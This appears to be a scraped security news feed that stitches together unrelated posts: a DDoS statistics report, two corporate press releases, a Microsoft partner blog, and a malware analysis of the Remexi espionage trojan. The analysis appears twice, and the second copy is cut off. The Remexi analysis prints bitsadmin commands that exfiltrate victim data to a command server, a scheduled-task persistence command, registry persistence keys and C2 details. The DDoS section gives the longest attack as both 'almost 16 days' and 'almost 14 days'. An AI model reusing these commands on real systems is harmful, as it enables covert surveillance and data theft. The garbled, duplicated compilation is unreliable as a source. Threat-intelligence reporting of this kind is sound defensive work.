The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary

  • China still tops the leaderboard by number of DDoS attacks, but its share fell quite significantly, from 77.67% to 50.43%. The US retained second position (24.90%), and Australia came third (4.5%). The Top 10 waved goodbye to Russia and Singapore, but welcomed Brazil (2.89%) and Saudi Arabia (1.57%).
  • By geographical distribution of targets, the leaders remain China (43.26%), the US (29.14%), and Australia (5.91%). That said, China’s share fell significantly, while all other Top 10 countries increased theirs.
  • Most of the botnet-based attacks last quarter occurred in October; holiday and pre-holiday periods were calmer. In terms of weekly dynamics, attack activity rose mid-week and decreased towards the end.
  • Q4 witnessed the longest attack seen in recent years, lasting almost 16 days (329 hours). In general, the share of short attacks decreased slightly, but the fluctuations were minor.
  • The share of UDP floods increased significantly to almost a third (31.1%) of all attacks. However, SYN flooding is still leading (58.2%).
  • In connection with the rising number of Mirai C&C servers, the shares of the US (43.48%), Britain (7.88%), and the Netherlands (6.79%) increased.

Attack geography

In the last quarter of 2018, China still accounted for most DDoS attacks. However, its share was down by more than 20 p.p.: from 77.67% to 50.43%.

Meanwhile, the share of the US, which took second place, almost doubled to 24.90%. As in the previous quarter, bronze went to Australia. Its share also practically doubled: from 2.27% to 4.5%. Hong Kong’s share rose only slightly (from 1.74% to 1.84%), causing it to drop to sixth place, ceding fourth position to Brazil. The latter’s indicators had been quite modest up to now, but this quarter its share was 2.89%.

An unexpected newcomer in the ranking was Saudi Arabia, whose share climbed to 1.57%, good enough for seventh spot. This time, the Top 10 had no room for Russia and Singapore. South Korea, having ranked in the Top 3 for several years before dropping to 11th in Q3, not only failed to return to the Top 10, but fell even lower, nosediving to 25th.

The shares of the other top-tenners also increased compared with summer and early fall. The same applies to the total share of countries outside the Top 10 — it increased by more than 5 p.p., from 2.83% to 7.90%.

&&

Distribution of DDoS attacks by country, Q3 and Q4 2018 (download)

The distribution of targets by country corresponds to the distribution pattern for number of attacks: China still leads, but its share fell by just over 27 p.p., from 70.58% to 43.26%. The US remains second, although its share grew from 17.05% to 29.14%. Third place again belongs to Australia, also with an increased share (5.9%).

Russia and South Korea, until recently considered Top 10 regulars, slipped well down — as in the rating by number of attacks, they finished 17th and 25th, respectively. They were replaced by new entrants Brazil (2.73%) in fourth place and Saudi Arabia (2.23%) in fifth. The shares of all other countries, as in the previous ranking, also rose slightly. Twofold growth was observed in the case of Canada (from 1.09% to 2.21%), whose results in the past few quarters have fluctuated around 1%, never exceeding 1.5%.

The share of the countries outside of Top 10 almost tripled: from 3.64% to 9.32%.

&&

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2018 (download)

Dynamics of the number of DDoS attacks

Most of the attack peaks occurred at the start of the quarter (October), with another small surge of activity coming in early December. Unlike last year, there were no clear-cut spikes connected to the autumn and winter holidays, rather the opposite: post-festive periods were quieter. The stormiest days were October 16 and 18, and December 4; the calmest was December 27.

&&

Dynamics of the number of DDoS attacks in Q4 2018  (download)

Whereas Q3 attacks were distributed relatively evenly over the days of the week, in Q4 the differences were more pronounced. The quietest day was Sunday (12.02% of attacks), the most active was Thursday: 15.74% of DDoS attacks occurred mid-week. Some correlation can be seen here with the distribution of attacks by date: both weekends and holidays in the previous quarter were calmer.

&&

Distribution of DDoS attacks by day of the week, Q3 and Q4 2018 (download)

Duration and types of DDoS attacks

The longest Q4 attack we monitored lasted a near record-breaking 329 hours (almost 14 days); for a longer attack, we have to go back to late 2015. That is approximately 1.5 times the duration of the previous quarter’s longest attack of 239 hours (about 10 days).

The total share of attacks longer than 140 hours in the previous quarter increased only slightly (+0.01 p.p.) to 0.11%. The proportion of relatively long attacks (50–139 hours) also increased, from 0.59% to 1.15%. However, the most significant rise was observed in the category of 5–9 hour attacks: from 5.49% to 9.40%.

Accordingly, the share of short attacks less than 4 hours in duration decreased slightly, to 83.34%. For comparison, in Q3 they accounted for 86.94% of all attacks.

&&

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2018 (download)

The distribution of attacks by type in the last quarter underwent a bit of a shakeup. SYN flooding remains the most common, but its share dropped from 83.20% to 58.20%. That allowed UDP flooding to increase its share to almost a third of all types of DDoS attacks (31.10%), up from the more modest 11.90% in Q3.

In third place was TCP flooding, whose share also rose — to 8.40%. The share of attacks via HTTP dropped to 2.20%. In last place again, with its share falling to 0.10%, was ICMP flooding.

&&

Distribution of DDoS attacks by type, Q4 2018 (download)

The ratio of Windows and Linux botnets barely moved against Q3. The share of Linux botnets increased slightly, up to 97.11%. Accordingly, the share of Windows botnets dropped by the same margin (1.25 p.p.) to 2.89%.

&&

Ratio of Windows/Linux botnet attacks, Q3 and Q4 2018 (download)

Botnet distribution geography

The US remains out in front in terms of botnet C&C server hosting, even extending its lead from 37.31% to 43.48%. Slipping to seventh, Russia (4.08%) ceded second place to Britain (7.88%). Bronze went to the Netherlands, whose share increased from 2.24% to 6.79%. Significantly, all this growth is attributable to the rising number of Mirai C&C servers.

Italy and the Czech Republic vacated the Top 10 of botnet-rich countries, while Germany (5.43%) and Romania (3.26%) moved in. China (2.72%) continues to lose ground, clinging on to tenth position in Q4.

&&

Distribution of botnet C&C servers by country, Q4 2018 (download)

Conclusion

For the third quarter in a row, the Top 10 ratings of countries by number of attacks, targets, and botnet C&C servers continue to fluctuate. Growth in DDoS activity is strongest where previously it was relatively low, while the once-dominant countries have seen a decline. This could well be the result of successful law enforcement and other initiatives to combat botnets. Another reason could be the emergence of better communications infrastructure in regions where DDoS attacks used to be infeasible.

If the trend continues, next quarter’s Top 10 will likely feature some more new entries, and in the long run, the shares of different countries could start to even out.



Securelist

Orange Acquires SecureData To Increase Its International Reach And Expertise In Cybersecurity.

Orange announces the acquisition of 100% of SecureData Group, and its consulting subsidiary SensePost.

SecureData is the largest independent cybersecurity service provider in the UK, the largest market in Europe.

This acquisition is yet another step toward establishing Orange’s position as a leading player in the European cybersecurity market.

Orange has announced today the acquisition of SecureData Group for an undisclosed amount.

The UK-based company, SecureData, is the largest independent cybersecurity service provider in the UK, the first market in Europe. The company has a 25-year track record of providing integrated cyber solutions designed to assess risks, detect threats, protect customer’s IT assets and respond to security incidents. The company’s elite consulting arm, SensePost, enjoys a worldwide reputation for its expertise in cyber-criminality, security research and penetration testing. The company recorded annual revenues of circa 50 million euros in 2018 and has enjoyed consistent growth rates of approx. 20% since 2016.

With over 200 employees in the UK and South Africa and a well-respected management-team, the company is well-positioned on the strategically-key British and Anglophone cybersecurity market. By offering improved access to this crucial market, SecureData constitutes an opportunity to expand Orange’s capabilities, particularly in Europe.

Through additional technical cooperation, SecureData will help reinforce Orange’s strategic position in cyberdefense by bringing a new source of expertise and innovative technology. SecureData also boasts an advanced cyber-SOC (Security Operations Center) in the UK that will reinforce Orange Cyberdefense’s international reach by building upon the existing network of nine cyber-SOCs dedicated to monitoring and responding to security breaches on behalf of its customers.

By working alongside Orange Cyberdefense’s existing operations in France and Belgium, SecureData will ensure its continued development by leveraging access to Orange Business Services’ existing sales force and its customer base of over 3000 multinational companies, and will benefit from the carrier-grade CERT and threat intelligence team. The envisaged organisation is designed to ensure continuity of SecureData’s commercial and operational autonomy.

“We are very proud and happy to announce the acquisition of SecureData, which will mark a major milestone in Orange’s development in Europe’s cybersecurity market. SecureData, just like Orange Cyberdefense, has successfully made the transition toward Managed Security Services, and shares the same passion for Cyber. We will progressively co-build together the operational and commercial synergies, with the patronage and experience of Michel Van Den Berghe, CEO of Orange Cyberdefense. Cybersecurity has become a critical element for both large and small companies as they evolve in an increasing digital-reliant world. We are convinced that the combined expertise of Orange Cyberdefense and SecureData will provide a powerful resource for our customers in ensuring the protection of their valuable data.” said Hugues Foulon, Executive Director of Strategy and Cybersecurity activities at Orange.

Ian Brown, Executive Chairman at SecureData commented “We are both thrilled and excited to be joining the Orange Cyberdefense family. Both organisations share the same vision and aspiration for the cybersecurity market, and have many complementary services and skills. By being part of Orange we will be able to better serve the international needs of many of our existing customers as well as providing enhanced cyber services to Orange customers with the UK”.

The post Orange Acquires SecureData To Increase Its International Reach And Expertise In Cybersecurity. appeared first on IT Security Guru.

Inspired and powered by partners

$32 billion in revenue. That’s an incredible number that Satya Nadella and Amy Hood shared during the Q2 earnings call last week. Just as impressive is the commercial cloud revenue increase of 48 percent year-over-year to $9 billion. Did you know that 95 percent of Microsoft’s commercial revenue flows directly through our partner ecosystem? With more than 7,500 partners joining that ecosystem every month, partner growth and partner innovation are directly fueling our commercial cloud growth. One accelerant, the IP co-sell program, now has thousands of co-sell ready partners that generated an incredible $8 billion in contracted partner revenue since the program began in July 2017.

It’s exciting to see the success of our partners, and to know we are collaborating with businesses of all types and sizes wherever there is opportunity. We’re working together with partners old and new to help them build their own digital capability to compete and grow. We’ve doubled down on our partnership with Accenture and Avanade, creating the new Accenture Microsoft Business Group to help customers overcome disruption and lead transformation in their industries. We’re partnering in new ways with customers like Kroger to bring their new Retail as a Service solution built on Azure, to use in their stores – and to sell to other retailers.

Part of Microsoft’s digital transformation is moving beyond transactional reselling via partners, to a true partnership philosophy where we’re working together to develop and sell each other’s technology and solutions. Our partners are building on our technology, collaborating with partners across borders to build repeatable solutions, and creating new revenue opportunities that didn’t exist in the past. We focus as much on selling third-party solutions as our own, and the speed of the cloud enables all of us to accelerate value to our customers.

I want to share more with you about how hundreds of thousands of Microsoft partners are powering customer innovation, and how we are evolving our partnership strategy in order to drive tech intensity for customers around the world.

Partner success and momentum

With hundreds of thousands of partners across the world, our partner ecosystem is stronger than ever.

CSP: Through our Cloud Solution Provider (CSP) program, our fastest-growing licensing model, partners are embedding Microsoft technologies into their own solutions and delivering more differentiated, long-term value for customers. The number of partners transacting through CSP is up 52 percent, and they are serving more than 2 million customers.

Azure Expert MSP: The Azure Expert MSP program has grown to 43 partners that deliver consistent, repeatable, high-fidelity managed services on Azure and are driving more than $100,000 per month in Azure consumption. A big part of this volume is in migration services, as SQL Server 2008 phases out this summer, followed by Windows Server 2008 a year from now. The opportunity for partners can’t be understated. Our estimates put the opportunity around $50 billion for partners to help customers move their existing on-premises workloads to Azure and start capitalizing on the benefits of the cloud.

IP Co-Sell: Our industry-leading IP co-sell program that rewards Microsoft sellers for selling third-party solutions is a runaway success, generating $8 billion in contracted partner revenue since July. Our partners are reaping the benefits and seeing co-sell deals close nearly three times faster, projects that are nearly six times larger, and drive six times more Azure consumption.

Building the largest commercial marketplace

Gartner estimates the opportunity for business applications will be $133 billion this year, with independent software vendors (ISVs) driving more than half of that. So we are upping our commitment to ISVs by investing in Microsoft’s marketplaces, Azure Marketplace, and AppSource, to build the largest commercial marketplace in the industry. Our marketplace provides a frictionless selling and buying experience that brings parity to first and third-party solutions and meets the needs of both IP builders and software purchasers. Partners with solutions in our marketplace can sell directly to more than a billion customers and partners, and they benefit from lower deployment costs and flexible procurement models for software. Through the marketplace go-to-market services, we’ve seen partners achieve an average of 40 percent reduction in cost per lead, and a 2x lead conversion to sales rate compared to industry averages.

New capabilities are coming soon to AppSource and Azure Marketplace. One of the biggest developments is the ability for partners to offer their solutions to our partner ecosystem through the CSP program, with a single click. We’re also improving the user experience and interface with natural language and recommendations features. And by setting up private marketplaces, partners will be able to customize the terms for any specific customer—billing or metering their services on a per-user, per-app, per-month, or per-day basis to meet customer needs. And soon we’ll be offering curated portfolio IP & Services solutions that leverage Azure, Dynamics, Power BI, Power Apps, and Office.

AI for enterprise

IDC estimates that global spending on cognitive and artificial intelligence systems is expected to triple between 2018 to 2022, from $24 billion to $77.6 billion. And just like Microsoft transformed the way people work and live by making personal computing widely accessible in the 1980s and 1990s, we plan to do the same with artificial intelligence. Our aim is to make AI accessible to and valuable for everyone. We’ll do it by focusing on AI innovations that extend and empower human capabilities, while keeping people in control. Our partners are finding huge success and growth in the AI space. Through our AI Inner Circle Partner program, partners provide custom services and enhanced AI solutions to customers and have seen more than 200 percent growth in their AI practices year-over-year.

As we encourage partners to go all-in on AI, we need to make sure they have substantial resources and training. So, we’ve developed AI Practice Development Workshops, Advanced Education, trainings in the classroom, online, and at events. So far, since July, more than 29,000 people have been trained across Microsoft’s data and AI portfolios. Our popular AI Partner Development Playbook and library of online resources—collectively with more than 1 million downloads—have put answers at the fingertips of partners launching and expanding their AI services.

New HR skills playbook and tools

The latest in our series of Cloud Practice Development Playbooks, released today, is an outstanding human resources guide for partners and customers. We collected input from more than 700 partners to develop “Recruit, Hire, Onboard & Retain Talent.” It is a hands-on guide to walk partners through the HR process of recruiting, hiring, and onboarding employees. Alongside the playbook, we’re launching a new learning portal on MPN that simplifies partner training, and a new Partner Transformation Assessment Tool to help partners map resources and investments against solution areas and workloads.

Partner opportunities ahead

Microsoft’s mission is to empower every person and every organization on the planet to achieve more. And we know that partners make more possible. As a customer-first, partner-led company, we start with the needs of our customers and work with our partners to deliver the best outcomes for each organization. We look forward to continued evolution in the Microsoft-partner relationship this year—with more innovation in AI, more co-selling opportunities, and more ways to connect partners to customers and to other partners through Azure Marketplace and AppSource. I invite you to learn more about how Microsoft leaders from the Azure, Dynamics, and ISV teams are supporting our partners, and how partners can capitalize on the opportunities ahead.

 

 

 

 

The post Inspired and powered by partners appeared first on The Official Microsoft Blog.

Royal Air Force Selects SecureCloud+ For Team Tempest Network Collaboration Services.

Reading & Farnborough 4 February 2019. SecureCloud+, a trusted provider of next-generation secure information systems to government and defence, has been contracted by the Royal Air Force to deliver network collaboration services for Team Tempest.

Team Tempest is a global network of international partners formed by the Royal Air Force Rapid Capability Office (RCO) along with BAE Systems, Rolls Royce, MBDA and Leonardo. SecureCloud+ is the only SME to be part of the team, which is collaborating to meet a vision outlined in the UK Government’s defence modernisation plans. Team Tempest has signed a contract to develop a Next Generation Combat Air System capable of operating in the 2040+ environment.

Peter Williamson, founder and CEO of SecureCloud+, said: “We have a proven track record of delivering defence contacts on time and on budget using modern technologies to promote better communications. Our innovation and agility are critical components to rapidly build and develop greater collaboration.

“We are pleased to support Team Tempest and the vision for the Future Combat Air System Technology Initiative. This contract reinforces our commitment to innovation. And it is not just about secure collaboration – it is also about managing digital assets across industries to remove barriers to sharing and building trusted teamwork.”

Air Commodore Linc Taylor: “This is a critical programme that will deliver huge value for UK military defence capabilities. We have a long history of delivering world-class combat systems through collaboration with our best industries; this capability offers us the ability to fundamentally change the way we work and share information within and across our teams.”

The post Royal Air Force Selects SecureCloud+ For Team Tempest Network Collaboration Services. appeared first on IT Security Guru.

Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities

Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption is used with quite long unique keys for different samples. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018. For more information please contact: intelreports@kaspersky.com

Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used GCC compiler on Windows in the MinGW environment.

Inside the binaries the compiler left references to the names of the C source file modules used: “operation_reg.c”, “thread_command.c” and “thread_upload.c”. Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP.

Proliferation

So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload. FTP server was not accessible any more at the time of our analysis.

Malware features

Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data.

Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions. The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below.

Utility Usage
extract.exe Deploys modules from the .cab file into the working Event Cache directory
bitsadmin.exe Fetches files from the C2 server to parse and execute commands. Send exfiltrated data
taskkill.exe Ends working cycle of modules

Persistence

Persistence modules are based on scheduled tasks and system registry. Mechanisms vary for different OS versions. In the case of old Windows versions like XP, main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for itself. For newer operating systems, events.exe creates task.xml as follows:

Then it creates a Windows scheduled task using the following command:

schtasks.exe /create /TN \"Events\\CacheTask_<user_name_here>" /XML \"<event_cache_dir_path>t /F"

At the system registry level, modules achieve persistence by adding themselves into the key:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

when it finds possible add values to the Winlogon subkey, and in

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager. All such indicators of comprometation are mentioned in correspondent appendix below.

Commands

All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them.

Command Description
search Searches for corresponding files
search&upload Encrypts and adds the corresponding files to the upload directory with the provided name
uploadfile Encrypts and adds the specified file to the upload directory with the provided name
uploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name
shellexecute Silently executes received command with cmd.exe
wmic Silently executes received command with wmic.exe (for WMI commands)
sendIEPass Encrypts and adds all gathered browser data into files for upload to C2
uninstall Removes files, directory and BITS tasks

Cryptography

To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Configuration

Config.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:

Field Sample value Description
diskFullityCheckRatio 1.4 Malware working directory size threshold. It will be deleted if it becomes as large as the free available space multiplied by this ratio
captureScreenTimeOut 72 Probability of full and active window screenshots being taken after mouse click
captureActiveWindowTimeOut 313
captureScreenQC 40 Not really used. Probably full and active window screenshot quality
captureActiveQC 40
CaptureSites VPN*0,0
Login*0,0
mail*0,0
Security*0,0
Window titles of interest for screenshots, using left mouse button and Enter keypress hook
important upLog.txt
upSCRLog.txt
upSpecial.txt
upFile.txt
upMSLog.txt
List of files to send to C2 using bitsadmin.exe from the dedicated thread
maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2
Servers http://108.61.189.174 Control server HTTP URL
ZipPass KtJvOXulgibfiHk Password for uploaded zip archives
browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread

Most of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut are worth describing in more detail as their programming logic is not so intuitive.

One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator infinitely. If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global variable. After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0. In that case, it takes a screenshot.

Main module (events.exe)

SHA256 b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31
MD5 c981273c32b581de824e1fd66a19a281
Compiled GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler
Type I386 Windows GUI EXE
Size 68 608

After checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility expand.exe with the following arguments:

expand.exe -r \"<full path to HCK.cab>\" -f:* \"<event_cache_dir_path>\\\"

Then it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:

ID Thread description
1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility
2 Decrypts command from registry using RC4 with a hardcoded key, and executes it
3 Transfers screenshots from the clipboard to \Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi)
4 Transfers screenshots to \Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies
5 Checks network connection, encrypts and sends gathered logs
6 Unhooks mouse and keyboard, removes bitsadmin task
7 Checks if malware’s working directory size already exceeds its threshold
8 Gathers victim´s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads

The malware uses the following command to receive data from its C2:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file>
http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>

Activity logging module (Splitter.exe)

This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc.

SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff
MD5 1ff40e79d673461cd33bd8b68f8bb5b8
Compiled 2017.08.06 11:32:36 (GMT), 2.22
Type I386 Windows Console EXE
Size 101 888

Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters:

Parameter Description
-scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”)
-ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Specifies the screen coordinates to take
-zip Name of password (from configuration data) protected zip archive
-clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration

Data exfiltration

Exfiltration is done through the bitsadmin.exe utility. The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>"

Victims

The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of these appear to be foreign diplomatic entities based in the country.

Attribution

The Remexi malware has been associated with an APT actor called Chafer by Symantec.

One of the human-readable encryption keys used is “salamati”. This is probably the Latin spelling for the word “health” in Farsi. Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New”. Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false flag.

Conclusions

Activity of the Chafer APT group has been observed since at least 2015, but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer. Traditionally, Chafer has been focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.

We will continue to monitor how this set of activity develops in the future.

Indicators of compromise

File hashes

events.exe
028515d12e9d59d272a2538045d1f636
03055149340b7a1fd218006c98b30482
25469ddaeff0dd3edb0f39bbe1dcdc46
41b2339950d50cf678c0e5b34e68f537
4bf178f778255b6e72a317c2eb8f4103
7d1efce9c06a310627f47e7d70543aaf
9f313e8ef91ac899a27575bc5af64051
aa6246dc04e9089e366cc57a447fc3a4
c981273c32b581de824e1fd66a19a281
dcb0ea3a540205ad11f32b67030c1e5a

splitter.exe
c6721344af76403e9a7d816502dca1c8
d3a2b41b1cd953d254c0fc88071e5027
1FF40E79D673461CD33BD8B68F8BB5B8
ecae141bb068131108c1cd826c82d88b
12477223678e4a41020e66faebd3dd95
460211f1c19f8b213ffaafcdda2a7295
53e035273164f24c200262d61fa374ca

Domains and IPs

108.61.189.174

Hardcoded mutexes

Local\TEMPDAHCE01
Local\zaapr
Local\reezaaprLog
Local\{Temp-00-aa-123-mr-bbb}

Scheduled task

CacheTask_<user_name_here>

Directory with malicious modules

Main malware directory: %APPDATA%\Microsoft\Event Cache
Commands from C2 in subdirectory: Cache001\cde00.acf

Events.exe persistence records in Windows system registry keys

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

Victims’ fingerprints stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData or
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData

RC4 encrypted C2 commands stored in

HKCU\SOFTWARE\Microsoft\Fax

HTTP requests template

http://<server_ip_from_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>
And bitsadmin.exe task to external network resources, addressed by IP addresses

Securelist: Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities

Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption is used with quite long unique keys for different samples. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018. For more information please contact: intelreports@kaspersky.com

Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used GCC compiler on Windows in the MinGW environment.

Inside the binaries the compiler left references to the names of the C source file modules used: “operation_reg.c”, “thread_command.c” and “thread_upload.c”. Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP.

Proliferation

So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload. FTP server was not accessible any more at the time of our analysis.

Malware features

Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data.

Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions. The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below.

Utility Usage
extract.exe Deploys modules from the .cab file into the working Event Cache directory
bitsadmin.exe Fetches files from the C2 server to parse and execute commands. Send exfiltrated data
taskkill.exe Ends working cycle of modules

Persistence

Persistence modules are based on scheduled tasks and system registry. Mechanisms vary for different OS versions. In the case of old Windows versions like XP, main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for itself. For newer operating systems, events.exe creates task.xml as follows:

Then it creates a Windows scheduled task using the following command:

schtasks.exe /create /TN \"Events\\CacheTask_<user_name_here>" /XML \"<event_cache_dir_path>t /F"

At the system registry level, modules achieve persistence by adding themselves into the key:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

when it finds possible add values to the Winlogon subkey, and in

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager. All such indicators of comprometation are mentioned in correspondent appendix below.

Commands

All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them.

Command Description
search Searches for corresponding files
search&upload Encrypts and adds the corresponding files to the upload directory with the provided name
uploadfile Encrypts and adds the specified file to the upload directory with the provided name
uploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name
shellexecute Silently executes received command with cmd.exe
wmic Silently executes received command with wmic.exe (for WMI commands)
sendIEPass Encrypts and adds all gathered browser data into files for upload to C2
uninstall Removes files, directory and BITS tasks

Cryptography

To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Configuration

Config.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:

Field Sample value Description
diskFullityCheckRatio 1.4 Malware working directory size threshold. It will be deleted if it becomes as large as the free available space multiplied by this ratio
captureScreenTimeOut 72 Probability of full and active window screenshots being taken after mouse click
captureActiveWindowTimeOut 313
captureScreenQC 40 Not really used. Probably full and active window screenshot quality
captureActiveQC 40
